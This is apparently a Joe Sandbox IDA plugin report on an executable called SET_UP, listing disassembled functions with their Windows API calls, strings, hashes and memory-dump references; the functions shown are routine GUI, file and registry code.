                                                                                                                                                                                                  • Opcode ID: bc4d3769f7496792df69763eb7216094d2f07d8f9723232074041208f18f02df
                                                                                                                                                                                                  • Instruction ID: f0df360174aeb8f797f1b7a1a611e5c73f045bc8c816e5ad05df41685e69454d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc4d3769f7496792df69763eb7216094d2f07d8f9723232074041208f18f02df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E925E719502199EDF04DFA4C986BEE77B4FF08704F10816AE905AB1D1EBB85A08CFA5
                                                                                                                                                                                                  Function 0042190D Relevance: 44.5, APIs: 24, Strings: 1, Instructions: 715COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00421912
                                                                                                                                                                                                    • Part of subcall function 00420A8D: __EH_prolog.LIBCMT ref: 00420A92
                                                                                                                                                                                                    • Part of subcall function 00420A8D: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000001,00000000,?,?,?,Software\Classes\CLSID\%s,?), ref: 00420ACD
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00421941
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Software\Classes\CLSID\%s, xrefs: 00421A57
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$CountCreateTick
                                                                                                                                                                                                  • String ID: Software\Classes\CLSID\%s
                                                                                                                                                                                                  • API String ID: 984754323-3302616724
                                                                                                                                                                                                  • Opcode ID: e601ae66cf68449a0b2a1495ac2d4c6c44d889691d1261dea645d009b47e425a
                                                                                                                                                                                                  • Instruction ID: 3eb45bfe1d795ff0d9c75419719bf6b22d281f5bbc1c15580080e9440e294c24
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e601ae66cf68449a0b2a1495ac2d4c6c44d889691d1261dea645d009b47e425a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98222274BC0324B6FE2892619C87FBE25569BB4B14FA4812BF3117D1E0DEED1D46820E
                                                                                                                                                                                                  Function 004B09F5 Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 343windowkeyboardCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004B09FA
                                                                                                                                                                                                  • GetKeyState.USER32(00000001), ref: 004B0A47
                                                                                                                                                                                                  • GetKeyState.USER32(00000002), ref: 004B0A54
                                                                                                                                                                                                  • GetKeyState.USER32(00000004), ref: 004B0A61
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004B0A82
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004B0B5C
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000435,00000000,?), ref: 004B0BA0
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000432,00000000,00000028), ref: 004B0BB8
                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004B0BD4
                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 004B0C2B
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,?), ref: 004B0C49
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000432,00000000,00000028), ref: 004B0CAB
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 004B0CCE
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000028), ref: 004B0CEA
                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 004B0CFD
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000433,00000000,00000138), ref: 004B0D29
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004B0D77
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004B0DA8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
                                                                                                                                                                                                  • String ID: ($($@
                                                                                                                                                                                                  • API String ID: 986702660-2846432479
                                                                                                                                                                                                  • Opcode ID: 6e91845d52aaf5fe75d76d1dc0e3adf5a66ad4fd44e1580f2e9503515d1676c3
                                                                                                                                                                                                  • Instruction ID: 24e68b77ca600da5614925fbaea1752e8c87ebcfae0365e4a7379902296c4110
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e91845d52aaf5fe75d76d1dc0e3adf5a66ad4fd44e1580f2e9503515d1676c3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4C1C171A003149BDF249FA5CC88BEFBBB5AF04301F14453AE915BA2E1C778E941CB69
                                                                                                                                                                                                  Function 00420416 Relevance: 35.0, APIs: 23, Instructions: 521COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountH_prologTick
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2378785137-0
                                                                                                                                                                                                  • Opcode ID: 4caa8e640146a5a0902d0a51bbf22612b8531f3e3a53185df817bbfc1fe7f88f
                                                                                                                                                                                                  • Instruction ID: 044fa40d664d14d3b6a6feaa44f26e224bf9de6da753db9ab8a368b14a05259f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4caa8e640146a5a0902d0a51bbf22612b8531f3e3a53185df817bbfc1fe7f88f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C022734600315ABDF28EF22D864EAB77A9EF90328F40C11FF955866D2DB38E945CB54
                                                                                                                                                                                                  Function 004407C0 Relevance: 32.6, APIs: 21, Instructions: 1076COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __ftol
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 495808979-0
                                                                                                                                                                                                  • Opcode ID: cd8494936c0b93d4fafc3c44230cec43537dc7ee4a877c549d486c6e4548aa36
                                                                                                                                                                                                  • Instruction ID: 3dbdbb62e61c85d376fdd006057ac742b68d9e0cef9bc09d0545b0a1920cbc85
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd8494936c0b93d4fafc3c44230cec43537dc7ee4a877c549d486c6e4548aa36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 889276716083818FD324DF29C490A6BBBE5FFC9304F14892EF58A87362D7349959CB5A
                                                                                                                                                                                                  Function 004ACC70 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 298COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetPropA.USER32(?,?), ref: 004ACCB5
                                                                                                                                                                                                  • CallWindowProcA.USER32(00000000), ref: 004ACCD7
                                                                                                                                                                                                    • Part of subcall function 004AB9C0: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 004AB9E6
                                                                                                                                                                                                    • Part of subcall function 004AB9C0: RemovePropA.USER32(?,?), ref: 004AB9FE
                                                                                                                                                                                                    • Part of subcall function 004AB9C0: RemovePropA.USER32(?,?), ref: 004ABA0A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Prop$CallProcRemoveWindow
                                                                                                                                                                                                  • String ID: #32770
                                                                                                                                                                                                  • API String ID: 2276450057-463685578
                                                                                                                                                                                                  • Opcode ID: 18411c5c495311092754111d979d6b4eef68f50bfd53aa7fd9b2c3450815fe60
                                                                                                                                                                                                  • Instruction ID: bac933c45dc9b58754653b4c78f86fe943070f91507bdf925fa2748824eaf7a2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18411c5c495311092754111d979d6b4eef68f50bfd53aa7fd9b2c3450815fe60
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84812B367013047BD690AB51DCC4EAF7B5CEBA77A5F000827FA05C3291D76A9905C7BA
                                                                                                                                                                                                  Function 004A828C Relevance: 27.9, Strings: 22, Instructions: 417COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$bzP$c$e
                                                                                                                                                                                                  • API String ID: 0-1843565883
                                                                                                                                                                                                  • Opcode ID: 062780a77a4c6da23b5abb2aaa1e30fd4fb397a2a22e82db805a765407336237
                                                                                                                                                                                                  • Instruction ID: 22af979be3bccf1c1f05ddd3ec96d79b077dba454c91bbcbe497f09c617ea65e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 062780a77a4c6da23b5abb2aaa1e30fd4fb397a2a22e82db805a765407336237
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34E1CE71D45249EEEF24CA54C8453BE7BB0FB26304F28402FD801AA292DF7D8982DB1D
                                                                                                                                                                                                  Function 00449BA0 Relevance: 26.5, APIs: 17, Instructions: 1028COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __ftol
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 495808979-0
                                                                                                                                                                                                  • Opcode ID: 635a1bd8e2d858e2610fd5987f1cd8533248737c4c332c7e7182ba5f7e40e3e0
                                                                                                                                                                                                  • Instruction ID: 8fce3069de065d501a46c11720f19998de208dc45e4839d8d98e68e5a3c4da1d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 635a1bd8e2d858e2610fd5987f1cd8533248737c4c332c7e7182ba5f7e40e3e0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6492567160C3828FD314CF15D4946ABBBE5FFC9304F058A6EE4CA92265D7349A29CB87
                                                                                                                                                                                                  Function 00498514 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 234timefileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,0000076C), ref: 00498583
                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(00000000,?,?,0000076C), ref: 004985DF
                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,0000076C), ref: 0049864E
                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,-B,?,0000076C), ref: 00498664
                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,0000076C), ref: 004986BA
                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,-B,?,?,?,?,?,?,0000076C), ref: 004986D0
                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000076C), ref: 00498728
                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,-B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000076C), ref: 0049873E
                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 00498775
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0000076C), ref: 004987B7
                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,0000076C), ref: 004987C7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$File$FindLocalSystem$Close$DriveErrorFirstLastType
                                                                                                                                                                                                  • String ID: ./\$-B
                                                                                                                                                                                                  • API String ID: 816071114-1859117140
                                                                                                                                                                                                  • Opcode ID: ef59506aa57cca7fbe586ebfd5e2dfeb3c7db813330021b870f40605f0b7e9d6
                                                                                                                                                                                                  • Instruction ID: 3b43b2ae1769a536af764b24c5ef84b160be1ce531aadd1fa711d00e93a33e29
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef59506aa57cca7fbe586ebfd5e2dfeb3c7db813330021b870f40605f0b7e9d6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91814271800219AECF20AFEA8C44AAFBBBCFF05715F1045AFF545D6150EB389940CB69
                                                                                                                                                                                                  Function 004AC4C0 Relevance: 19.7, APIs: 13, Instructions: 220windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CallWindowProcA.USER32(00000000,00000000,?,?,?), ref: 004AC4FA
                                                                                                                                                                                                  • DefWindowProcA.USER32(00000000,?,?,?), ref: 004AC50D
                                                                                                                                                                                                  • IsIconic.USER32(00000000), ref: 004AC52F
                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 004AC55C
                                                                                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 004AC56B
                                                                                                                                                                                                  • GetWindowDC.USER32(00000000), ref: 004AC5AC
                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004AC5BA
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004AC5FD
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004AC620
                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 004AC62E
                                                                                                                                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 004AC684
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2215177122-0
                                                                                                                                                                                                  • Opcode ID: ddee0ca52af866fb8d914bc6a9c5a848ec0f9968a1bd6099e93802d0175e0702
                                                                                                                                                                                                  • Instruction ID: b4899f8dc0458f595c0a6581c64c733003fd925ac129564273eda8a89bbcac18
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddee0ca52af866fb8d914bc6a9c5a848ec0f9968a1bd6099e93802d0175e0702
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F81A975608301AFC340CF68DC85E6BB7E4FB99318F004A2DF98587291E775E906CBA6
                                                                                                                                                                                                  Function 004B518C Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004B5486,?,00020000,?,?,?,004B05DC,00001000,?,?,?,0040DE70), ref: 004B5195
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,?,?,004B05DC,00001000,?,?,?,0040DE70,?,00000000,5000001C,00000000), ref: 004B519E
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004B51B2
                                                                                                                                                                                                  • #17.COMCTL32(?,?,?,004B05DC,00001000,?,?,?,0040DE70,?,00000000,5000001C,00000000), ref: 004B51CD
                                                                                                                                                                                                  • #17.COMCTL32(?,?,?,004B05DC,00001000,?,?,?,0040DE70,?,00000000,5000001C,00000000), ref: 004B51E9
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,004B05DC,00001000,?,?,?,0040DE70,?,00000000,5000001C,00000000), ref: 004B51F5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                                                                                                                  • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                                                                                                                                  • API String ID: 1437655972-4218389149
                                                                                                                                                                                                  • Opcode ID: a63016164256eab557a4637b560a9335cfc19b9ead63ecbb56627adf215bf059
                                                                                                                                                                                                  • Instruction ID: 6c01398aa721e929aa4b5f9f759286312cb1bd5f068da7228324b6e718ffc8d5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a63016164256eab557a4637b560a9335cfc19b9ead63ecbb56627adf215bf059
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F0A932A007538B57116B7A9C88F5BB6A8EB947517150436F940E3310DB68DC01877E
